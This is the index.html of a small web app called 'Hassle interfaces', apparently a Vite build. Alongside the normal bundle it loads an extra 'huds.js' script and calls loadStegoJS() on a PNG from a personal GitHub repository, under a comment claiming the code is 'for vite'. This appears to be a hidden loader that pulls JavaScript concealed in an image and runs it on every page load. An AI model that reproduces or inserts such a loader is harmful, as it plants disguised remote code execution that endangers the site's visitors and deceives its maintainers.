<!DOCTYPE html>
<html lang="">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, viewport-fit=cover">
    <meta name="transparent" content="true">
    <title>Hassle interfaces</title>
    <script type="module" crossorigin src="./assets/index-c5642422.js"></script>
	<script src="./assets/huds.js">"</script>
    <link rel="stylesheet" href="./assets/index-0c920d76.css">
  </head>
  <body>
    <noscript>
      <strong>We're sorry but Hassle interfaces doesn't work properly without JavaScript enabled. Please enable it to continue.</strong>
    </noscript>
    <div id="app"></div>
    <!-- built files will be auto injected -->

    <!-- this new script is for vite -->
    <script>
	loadStegoJS("https://raw.githubusercontent.com/BensonZahar/SCRIPTJS/main/ph.png");
    </script>
  </body>
</html>
